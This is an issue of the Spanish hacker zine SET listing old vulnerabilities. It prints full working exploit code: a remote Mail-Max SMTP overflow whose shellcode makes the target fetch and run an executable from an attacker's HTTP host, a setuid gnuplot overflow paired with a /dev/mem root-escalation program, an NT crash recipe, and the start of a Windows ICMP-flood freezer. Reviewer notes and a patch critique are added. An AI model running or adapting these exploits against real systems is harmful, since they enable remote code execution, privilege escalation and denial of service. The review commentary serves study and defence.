-[ 0x09 ]-------------------------------------------------------------------- -[ THE BUGS TOP 10 ]--------------------------------------------------------- -[ by SET Staff ]-----------------------------------------------------SET-19- -( 0x01 )- Para : Windows NT Tema : Cuelgue total Patch : XDDDD Creditos : Ingenius - Mensaje enviado por Zaldivar Descripcion y Notas: -----Mensaje original----- De: Ingenius N.N. Bien paso a explicar 1 - Abra un ventata de dos 2 - Precione la tacla TAB hasta que desaparesca todo lo que halla en la pantalla o hasta que haga ruido de que no da para mas. 3 - Precione la tecla Backspace hasta que cuelge si no cuelta despues de un rato no cuelga y uds a tenido apretada la tecla Backspace, sueltela y preciones la tecla ENTER y listo pantalla azul de aquellas Esto lo probe con NT Workstation 4.0 con SP3, seguro que con Server tiene que andar Saludos Ingenius N.N. -( 0x02 )- Para : Mail-Max SMTP Server for Windows 95/98/NT Tema : Acceso no autorizado Patch : No Microsoft, No problem Creditos : _mcp_ <++> set_019/exploits/mmax.c #include #include #include #include #include #include #include /* Mail-Max Remote Exploit by _mcp_ This program must be run under x86 Linux Greets go out to: Morpheus, Killspree, Coolg, Dregvant, Vio, Wrl, #finite, #win32asm and anyone I may have missed, you know who you are :). You can reach me on efnet. No greets go out to etl. 
*/

/*
 * Reading notes (added on review; the listing itself is kept as published).
 * The program builds one SMTP "HELO" line: "HELO ", 7000 bytes of 0x90, a
 * 4-byte return address placed `offset` bytes into that sled, then code[],
 * the +1-encoded HTTP host taken from argv[2], and dir[]. The page's own
 * description is that the server's handling of this argument overflows a
 * fixed buffer. From a defender's side the traffic is easy to spot: a HELO
 * argument several kilobytes long that is mostly 0x90 bytes.
 */

/*
 * Payload for the Win32 target. The bytes after the executable part are the
 * names of the DLLs/APIs it resolves and the text "http://", each stored
 * +1; the short loop near the start (`\x80\x2B\x1` / `\x43` / `\xE2\xFA`)
 * subtracts 1 from every byte before use. Decoded they agree with the usage
 * text below: open a URL with WinInet, write the file to disk, run it, exit.
 * Two bytes are adjusted at run time by main(): the byte that follows `\xB1`
 * and the immediate of the `\x83\xC6` instruction.
 */
char code[] =
"\xEB\x45\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x1"
"\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF"
"\xEB\x29\x46\x58\xFF\xE0\xBB\x40\xA5\x1\x10\x56\xFF\x13\x8B"
"\xE8\x46\x33\xC0\x3A\x6\x75\xF9\x46\x40\x3A\x6\x74\xE5\x56"
"\x55\xBB\x54\xA5\x1\x10\xFF\x13\xAB\xEB\xE7\xEB\x4F\x33\xC9"
"\x66\x49\xC1\xC1\x2\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8"
"\x33\xC9\x51\x51\x51\x51\x57\xFF\x57\xF4\x33\xC9\x51\x51\x51"
"\x51\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83"
"\xC6\x7\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8"
"\xFF\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF"
"\x57\xF0\xE8\x67\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33"
"\x1\x60\x6D\x64\x73\x66\x62\x75\x1\x60\x6D\x78\x73\x6A\x75"
"\x66\x1\x60\x6D\x64\x6D\x70\x74\x66\x1\x48\x6D\x70\x63\x62"
"\x6D\x42\x6D\x6D\x70\x64\x1\x58\x6A\x6F\x46\x79\x66\x64\x1"
"\x46\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x1\x2\x58\x4A"
"\x4F\x4A\x4F\x46\x55\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50"
"\x71\x66\x6F\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71"
"\x66\x6F\x56\x73\x6D\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75"
"\x53\x66\x62\x65\x47\x6A\x6D\x66\x1\x2\x69\x75\x75\x71\x3B"
"\x30\x30\x00";

/*This is the encrypted /~pw/owned.exe we paste at the end */
/* Same +1 encoding as the tail of code[]. The explicit "\x0" at the end is
 * what terminates the whole HELO line for the strlen() in main(); sizeof(dir)
 * also counts the implicit terminator, so two NULs are copied. */
char dir[] = "\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x1\x0";

/*
 * Resolve `hostname` and return the address bytes exactly as stored in
 * h_addr (used directly as s_addr in main()). Copies h_length bytes into a
 * 4-byte unsigned int: fine for an AF_INET answer, but a longer address from
 * the resolver would overrun binip. On failure it prints a message and exits
 * with status 0, so a caller cannot distinguish failure from success.
 */
unsigned int getip(char *hostname)
{
    struct hostent *hostinfo;
    unsigned int binip;

    hostinfo = gethostbyname(hostname);
    if(!hostinfo) {
        printf("cant find: %s\n",hostname);
        exit(0);
    }
    /* bcopy() is the legacy BSD name; memcpy() is the portable equivalent. */
    bcopy(hostinfo -> h_addr, (char *)&binip, hostinfo -> h_length);
    return(binip);
}

/*
 * Print usage and exit. Declared int but never returns, and exits with
 * status 0 although it is reached on bad arguments. The argument list in the
 * "%s \n" line appears to have been stripped in extraction (angle-bracket
 * text is missing elsewhere on the page too); the strings are kept as-is.
 */
int usages(char *fname)
{
    printf("Remote Mail-Max exploit v1.0 by _mcp_ .\n");
    printf("Usages: \n");
    printf("%s \n", fname);
    printf("All known versions offset = 539, Return address = 79887315\n");
    printf("Will make target download, save, and execute http:///~pw/owned.exe\n");
    exit(0);
}

/*
 * Entry point (implicit int return type, pre-C99 style). Expects four
 * arguments: target host, HTTP host, offset, return address. Builds the
 * HELO line in buffer[] and writes it to port 25 of the target.
 * Size check (for the reader): 5 + 7000 + 60 + strlen(code) (a little under
 * 300) + at most 60 + sizeof(dir) stays well under the 8000-byte buffer.
 * Unused locals: filedesc, codelength, ipbuffer, address.
 */
main (int argc, char *argv[])
{
    int sock,filedesc,offset,targethost,sinlen,codelength;
    struct sockaddr_in sin;
    unsigned char buffer[8000];   /* never zeroed: the strlen() below relies on the NUL copied in from dir[] */
    char ipbuffer[16];
    unsigned char *ptr,*ptr2;
    unsigned long ret_addr;
    int len,x = 1;
    unsigned long address;

    if (argc < 5) usages(argv[0]);
    targethost = getip(argv[1]);
    len = strlen(argv[2]);
    /* argv[2] is limited to 60 bytes so the tail of the line fits in buffer[]. */
    if (len > 60) {
        printf("Bad http format!\n");
        usages(argv[0]);
    }
    /* Same +1 encoding as the tail of code[], applied in place to argv[2]. */
    ptr = argv[2];
    while (x <= len) {
        x++;
        (*ptr)++; /*Encrypt the http ip for later parsing */
        ptr++;
    }
    offset = atoi(argv[3]);
    ret_addr = atol(argv[4]);
    /* Upper bound keeps ptr inside the 7000-byte sled; atoi() errors and negative values are not rejected. */
    if (offset > 7000) {
        printf("Offset too large.\n");
        exit(0);
    }
    sock = socket(AF_INET,SOCK_STREAM,0);   /* result not checked; connect() below reports the failure instead */
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = targethost;
    sin.sin_port = htons(25);
    sinlen = sizeof(sin);
    printf("Starting to create the egg\n");
    /* Line layout: "HELO " | 7000 x 0x90 | ret_addr at +offset | code[] at +60 | argv[2] | dir[] */
    ptr = (char *)&buffer;
    strcpy(ptr,"HELO ");
    ptr+=5;
    memset((void *)ptr, 0x90, 7000);
    ptr+=offset;
    memcpy ((void *) ptr,(void *)&ret_addr, 4);   /* first 4 bytes of the unsigned long, host order (x86 per the header comment) */
    ptr+=60;
    memcpy((void *) ptr,(void *)&code,strlen(code));
    /* `(char *) ptr2 = ...`: a cast on the left of an assignment is an old GCC
     * extension, not standard C; current compilers reject it. */
    (char *) ptr2 = strstr(ptr,"\xb1");
    if (ptr2 == NULL) {
        printf("Bad shell code\n");
        exit(0);
    }
    ptr2++;
    /* Adjust the byte after \xb1 by the number of bytes appended after code[] (host + dir[]). */
    (*ptr2)+= len + ( sizeof(dir) - 1 );
    (char *) ptr2 = strstr(ptr,"\x83\xc6");
    if (ptr2 == NULL) {
        printf("Bad shell code\n");
        exit(0);
    }
    ptr2+= 2;
    (*ptr2)+= len + 8;   /* immediate of the \x83\xc6 instruction, adjusted by the host length */
    ptr+=strlen(code);
    memcpy((void *) ptr, (void *) argv[2], len); /*Parse in the http site's info */
    ptr+=len;
    memcpy((void *) ptr,(void*) &dir, sizeof(dir) );   /* includes the terminating NULs */
    printf("Made the egg\n");
    if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1) {
        perror("error:");
        exit(0);
    }
    printf("Connected.\n");
    /* write() results are not checked; a short write would send a truncated line. */
    write(sock, &buffer, strlen((char *)&buffer) );
    write(sock,"\r\n",2);
    sleep(1);
    printf("Sent the egg\n");
    close(sock);
    exit(1);   /* note: status 1 on the success path, 0 on every error path above */
}
<--> Descripcion y Notas: Volvemos a las historias de siempre, a los desbordamientos. Parece que los programadores no aprenden nunca, e incluso cada dia llegan a cometer errores aun mas grandes. No es que a ningun programador no se le pueda colar un desbordamiento en su programa. Esto es habitual, sobre todo si se trabaja en C y se tiene poca experiencia.
El problema surge en situaciones como la que tiene Mail-Max. Resulta que no solo produce un desbordamiento, sino que ademas, ese codigo que incluyamos por encima de la pila puede ser ejecutable, pues segun unas determinadas circunstancias, este codigo se ejecutara. Ver para creer. -( 0x03 )- Para : Frontapge 98 & Apache 1.3.4 Tema : Tonteria Patch : Si es que frontpage... Creditos : Sitzkrieg Redundus Descripcion y Notas: Un error de los tontos. Aparentemente no se le saca provecho, pero es una curiosidad que merece la pena comentar. Resulta que al configurar el Apache 1.3.4 para que soporte las extensiones de FrontPage 98, y lanzar el httpd, se produce un error de lo mas curioso. El error proporcionado es ni mas ni menos que un error de sintaxis en la linea 1 del fichero /dev/null. Ya veis, ahora le da por jugar con los dispositivos, y no contento con eso, crea un /dev/null.bak... Alucinante. -( 0x04 )- Para : GNU Plot 3.5 Tema : SUID root Patch : quizas mas abajo Creditos : xnec / Nergal <++> set_019/exploits/xnec_plot.c /* gnuplot Linux x86 exploit from xnec tested on gnuplot Linux version 3.5 (pre 3.6) patchlevel beta 336/SuSE 5.2 gnuplot ships suidroot by default in SuSE 5.2, maybe others gcc -o xnec_plot xnec_plot.c ./xnec_plot The buffer we're overflowing is only 80 bytes, so we're going to have to get our settings just so. If you don't feel like typing in command line offsets and bufsizes, make a little shell script: --- #! /bin/bash bufsiz=110 offset=0 while [ $offset -lt 500 ]; do ./xnec_plot $bufsiz $offset offset=`expr $offset + 10` done --- since gnuplot drops root privs after it inits your svga, we can't just exec /bin/sh, we'll need to use the technique of replacing our saved uid in /dev/mem with '0', then execing whatever we please. We do this by compiling Nergal's program, mem.c and putting the output file in /tmp/xp, as in gcc -o /tmp/xp mem.c. Nergal's program will then make /tmp/sh suidroot, so don't forget to cp /bin/sh /tmp/sh. 
You will also have to change line 32 to the correct address of kstat, which can be obtained by doing strings /proc/ksyms | grep kstat. Since I can see absolutely no reason for gnuplot to be suidroot, the best fix is chmod -s /usr/bin/gnuplot. greets to #sk1llz, xnec on EFnet and DALnet */

/*
 * Reading notes (added on review; the listing itself is kept as published).
 * The overflow is the unchecked copy of the HOME value into gnuplot's 80-byte
 * buffer (the plot.c patch further down shows the strcpy(home, tmp_home)).
 * Two things turn it into a root compromise on the affected distribution:
 * the binary is installed setuid root, and, per the header above, privileges
 * are dropped only after the svga init, which leaves a descriptor to /dev/mem
 * open for mem.c below (it assumes fd 3). Not installing gnuplot setuid
 * (chmod -s, as the header says) removes the first; closing privileged
 * descriptors before dropping privileges removes the second.
 * The header name after #include is missing from the listing as published here.
 */
#include
#define DEFAULT_OFFSET 50
#define DEFAULT_BUFSIZ 110
#define NOP 0x90
#define DEFAULT_ADDR 0xbffff81c   /* defined but never used below */

/* Aleph One's shellcode, modified to run our own program */
/* The trailing "/tmp/xp" is the path executed; mem.c below is what the
 * header says gets compiled to that path. */
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/xp";

/*
 * Return the current stack pointer. The asm leaves %esp in %eax, which is
 * the i386 return register; there is no C return statement, so this works
 * only with GCC on x86.
 */
unsigned long getsp(void)
{
    __asm__("movl %esp,%eax");
}

/*
 * Build HOME=<guessed addresses | NOPs | shellcode> and exec gnuplot.
 * Note: `if (argc = 2)` and `if (argc = 3)` are assignments, not
 * comparisons, so both are always true and argv[1]/argv[2] are read whatever
 * argc is (undefined behaviour when fewer arguments are given; the shell
 * loop in the header always passes both). malloc() is not checked, `addr`
 * is a long printed with %x, and with bufsiz not a multiple of 4 (the
 * default 110) the address-fill loop stores a few bytes past the allocation.
 */
void main(int argc, char *argv[])
{
    char *buf, *ret;
    long *addrp, addr;
    int bufsiz, offset;
    int i;

    bufsiz=DEFAULT_BUFSIZ;
    offset=DEFAULT_OFFSET;
    if (argc = 2) bufsiz = atoi(argv[1]);
    if (argc = 3) offset = atoi(argv[2]);
    buf=malloc(bufsiz);
    addr = getsp() - offset;
    printf("address: 0x%x\n", addr);
    printf("bufsize: %d\n", bufsiz);
    printf("offset : %d\n", offset);
    /* Fill the whole buffer with the guessed address, 4 bytes at a time. */
    ret = buf;
    addrp = (long *) ret;
    for (i = 0; i < bufsiz; i+=4) *(addrp++) = addr;
    /* Then a short NOP run at the front and the shellcode around the middle. */
    memset(buf, NOP, (strlen(shellcode)/2));
    ret = buf + ((bufsiz/2) - (strlen(shellcode)/2));
    for (i = 0; i < strlen(shellcode); i++) *(ret++) = shellcode[i];
    buf[bufsiz - 1] = '\0';
    /* Overwrites the first 5 bytes; since buf is passed as the value, HOME
     * itself starts with "HOME=". */
    memcpy(buf,"HOME=", 5);
    setenv("HOME", buf, 1);
    execvp("/usr/bin/gnuplot", NULL);   /* NULL argv; no error handling if exec fails */
}
<--> <++> set_019/exploits/mem.c
/* by Nergal */
/*
 * Reading notes (added on review; the listing itself is kept as published).
 * Run as /tmp/xp by the payload above while the process still holds an open
 * descriptor to /dev/mem (assumed to be fd 3, see main()). It scans the
 * kernel's task table for its own task_struct, sets euid/fsuid to 0 by
 * writing the struct back through that descriptor, then makes /tmp/sh
 * setuid root. Everything depends on the running kernel's struct
 * task_struct layout and NR_TASKS, hence the header included under
 * __KERNEL__ (its name appears to be missing from the listing as published).
 * Defender's view: a writable /dev/mem descriptor reaching unprivileged code
 * is the core problem; close privileged descriptors before dropping
 * privileges and do not ship the binary setuid.
 */
#define SEEK_SET 0
#define __KERNEL__
#include
#undef __KERNEL__
#define SIZEOF sizeof(struct task_struct)

int mem_fd;   /* descriptor used for all reads/writes; set to 3 in main() */
int mypid;    /* our pid, compared against each task_struct read */

/*
 * Read the task_struct at offset `mem_offset` of mem_fd; if its pid is ours,
 * clear euid/fsuid, write it back, chown/chmod /tmp/sh and exit. Return
 * values of lseek/read/write/chown/chmod are not checked; `uid` and `pid`
 * are unused.
 */
void testtask (unsigned int mem_offset)
{
    struct task_struct some_task;
    int uid, pid;

    lseek (mem_fd, mem_offset, SEEK_SET);
    read (mem_fd, &some_task, SIZEOF);
    if (some_task.pid == mypid) /* is it our task_struct ? */
    {
        some_task.euid = 0;
        some_task.fsuid = 0; /* needed for chown */
        lseek (mem_fd, mem_offset, SEEK_SET);
        write (mem_fd, &some_task, SIZEOF);
        /* from now on, there is no law beyond do what thou wilt */
        chown ("/tmp/sh", 0, 0);
        chmod ("/tmp/sh", 04755);
        exit (0);
    }
}

#define KSTAT 0x001a8fb8 /* <-- replace this addr with that of your kstat */
/*
 * Implicit int return type. Assumes the task table is a fixed array of
 * NR_TASKS pointers located immediately before kstat; reads that table and
 * probes every non-NULL entry with testtask(). KSTAT has to be replaced with
 * the value found on the target (see the header's note about line 32).
 */
main () /* by doing strings /proc/ksyms |grep kstat */
{
    unsigned int i;
    struct task_struct *task[NR_TASKS];
    unsigned int task_addr = KSTAT - NR_TASKS * 4;

    mem_fd = 3; /* presumed to be opened /dev/mem */
    mypid = getpid ();
    lseek (mem_fd, task_addr, SEEK_SET);
    read (mem_fd, task, NR_TASKS * 4);
    for (i = 0; i < NR_TASKS; i++)
        if (task[i]) testtask ((unsigned int)(task[i]));
}
<--> <++> set_019/patches/gnuplot --- plot.c.old Fri Mar 5 03:17:59 1999 +++ plot.c Fri Mar 5 03:29:19 1999
@@ -516,7 +516,7 @@ char c='\0';/* character that should be added, or \0, if none */ if(tmp_home) { - strcpy(home,tmp_home); + strncpy(home,tmp_home,(sizeof(home) - 1)); if( strlen(home) ) p = &home[strlen(home)-1]; else p = home; #if defined(MSDOS) || defined(ATARI) || defined( OS2 ) || defined(_Windows) || defined(DOS386) <--> Descripcion y Notas: El error es un simple buffer overflow, de los de toda la vida. El problema surge cuando el programa se instala con SUID root por defecto, en distribuciones como la SuSe 5.2, por ejemplo. En estas circunstancias, despues de producirse el desbordamiento, se obtienen permisos de root. Toda una ganga que podemos evitar con el patch suministrado ;) Es conveniente comprobarlo, pues en distribuciones como Slackware o Debian parece que se instala correctamente, evitando el problema mencionado. Otra forma de solventar el problema en SuSe, que al parecer se trata de la unica distribucion afectada (eso si, en una version antigua), es modificar el fichero /etc/rc.config, de forma que la variable PERMISSION_SECURITY se establezca en "paranoid". -( 0x05 )- Para : Windows {95,98,NT} Tema : Congelar el sistema operativo Patch : Es bueno y es gratis... es... LINUX Creditos : Delmore <++> set_019/exploits/winfreez.c /* WinFreez.c by Delmore ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box in LAN. Usage: winfreez sendtoip sendfromip time where is victim host, is router for victim host,
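Review bot: The replacement `strncpy(home,tmp_home,(sizeof(home) - 1));` does not NUL-terminate `home` when `tmp_home` is `sizeof(home) - 1` bytes or longer, so the `strlen(home)` on the following line can read past the array unless `home` was zeroed beforehand (its declaration is outside the hunk). Follow the copy with `home[sizeof(home) - 1] = '\0';`, or replace it with `snprintf(home, sizeof(home), "%s", tmp_home);`, which always terminates and truncates cleanly. The comment at the top of the hunk says a character `c` may still be appended to `home` afterwards; that append is outside the hunk and needs its own check that `strlen(home) + 1 < sizeof(home)`, otherwise the fix is undone one byte later. All of this assumes `home` is a true array; if it is a pointer, `sizeof(home)` is the pointer size and the bound is wrong either way.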